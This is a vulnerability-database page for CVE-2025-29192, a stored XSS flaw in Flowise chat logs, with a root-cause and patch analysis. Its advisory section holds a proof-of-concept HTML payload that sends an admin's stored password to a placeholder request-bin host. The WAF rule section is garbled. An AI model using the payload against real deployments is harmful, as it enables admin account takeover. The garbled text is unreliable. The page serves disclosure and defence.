5.3

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-29192

GHSA ID

GHSA-7r4h-vmj9-wg42

EPSS Score

0.10763%

CWE

CWE-79

Published

10/3/2025

Updated

10/13/2025

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-29192

CVE-2025-29192: Flowise Stored XSS vulnerability through logs in chatbot

Description

In the chat log, tags like input and form are allowed. This makes a potential vulnerability where an attacker could inject malicious HTML into the log via prompts. When an admin views the log containing the malicious HTML, the attacker could steal the admin's credentials or sensitive information with stored Cross Site Scripting.

PoC

<form>
  <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:alert('XSS!!!');" />
</form>

If the above HTML code is entered, a very large img gets injected into the log. When an admin clicks the generated img, it alerts ‘XSS!!!’. It means stored xss is able in the chatbot.

<form>
  <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:window.location.href='<YOUR_REQUESTBIN_SERVER>?passwd=' + encodeURIComponent(localStorage.getItem('password'));" />
</form>

So when an admin clicks the img that generated by above html code, it sends a request, including credentials, to the attacker's IP. If attacker steal admin’s token, attacker can login as the admin in the apps.

Poc Video

poc

Impact

An attacker could hijack an admin account in published chatbot. This can allow attacker to view chat logs of other users and API keys.

(GitHub Advisory)

5.3

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-29192

GHSA ID

GHSA-7r4h-vmj9-wg42

EPSS Score

0.10763%

CWE

CWE-79

Published

10/3/2025

Updated

10/13/2025

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
flowise	npm	< 3.0.5	3.0.5

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability is a stored Cross-Site Scripting (XSS) issue within the Flowise application, specifically in how it handles and displays user-provided content in chat logs and execution details. The root cause is the use of React's dangerouslySetInnerHTML property in multiple components to render HTML content that could be controlled by an attacker. The PoC demonstrates that an attacker could inject <form> and <input> tags to create interactive elements that, when clicked by an admin, execute malicious JavaScript to steal credentials or perform other unauthorized actions.

The investigation of the fixing commit 9a06a85a8ddcbaeca1342827a5fea9087a587d97 confirms this analysis. The patch systematically replaces instances of dangerouslySetInnerHTML across several React components (ViewMessagesDialog, NodeExecutionDetails, ChatMessage, and JSONViewer) with a newly introduced SafeHTML component. This new component utilizes the DOMPurify library to sanitize the HTML, explicitly forbidding dangerous tags like <form>, <input>, and <script>, and attributes like onerror and onclick. By sanitizing the content before it is rendered, the patch ensures that any malicious payloads are neutralized, thus mitigating the XSS vulnerability.

Vulnerable functions

ViewMessagesDialog

packages/ui/src/ui-component/dialog/ViewMessagesDialog.jsx

The `ViewMessagesDialog` component was vulnerable to stored XSS because it rendered HTML content from the `item.data` prop directly into the DOM using `dangerouslySetInnerHTML` without proper sanitization. An attacker could inject malicious HTML, such as a form with a JavaScript action, which would be executed when a user, like an admin, views the chat log. The patch replaces the unsafe rendering with a `SafeHTML` component that sanitizes the input.

NodeExecutionDetails

packages/ui/src/views/agentexecutions/NodeExecutionDetails.jsx

The `NodeExecutionDetails` component rendered `artifact.data` using `dangerouslySetInnerHTML`, which allowed for the injection and execution of arbitrary HTML and JavaScript. This could be exploited by an attacker to create malicious content that executes in the context of the user viewing the execution details. The fix was to use the `SafeHTML` component to sanitize the data before rendering.

ChatMessage

packages/ui/src/views/chatmessage/ChatMessage.jsx

The `ChatMessage` component was vulnerable to stored XSS as it displayed chat messages (`item.data`) using `dangerouslySetInnerHTML` without sanitization. This allowed an attacker to send a message containing a malicious HTML payload, which would be stored and later executed in the browser of anyone viewing the message. The patch mitigates this by using the `SafeHTML` component.

JSONViewer

packages/ui/src/ui-component/json/JsonViewer.jsx

The `JSONViewer` component used `dangerouslySetInnerHTML` to render syntax-highlighted JSON. The internal `syntaxHighlight` function performed insufficient escaping, making it potentially vulnerable to XSS if a crafted JSON payload could bypass the escaping logic. The patch refactored this component to build the DOM using safe React elements instead of raw HTML, removing the `dangerouslySetInnerHTML` call.

WAF Protection Rules

WAF Rule

### **s*ription In t** ***t lo*, t**s lik* input *n* *orm *r* *llow**. T*is m*k*s * pot*nti*l vuln*r**ility w**r* *n *tt**k*r *oul* inj**t m*li*ious *TML into t** lo* vi* prompts. W**n *n **min vi*ws t** lo* *ont*inin* t** m*li*ious *TML, t** *tt**k*

Reasoning

T** vuln*r**ility is * stor** *ross-Sit* S*riptin* (XSS) issu* wit*in t** *lowis* *ppli**tion, sp**i*i**lly in *ow it **n*l*s *n* *ispl*ys us*r-provi*** *ont*nt in ***t lo*s *n* *x**ution **t*ils. T** root **us* is t** us* o* R***t's `**n**rouslyS*tI

5.3

Basic Information

Concerned about an active attack path?

CVE-2025-29192: Flowise Stored XSS vulnerability through logs in chatbot

Description

PoC

Poc Video

Impact

5.3

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI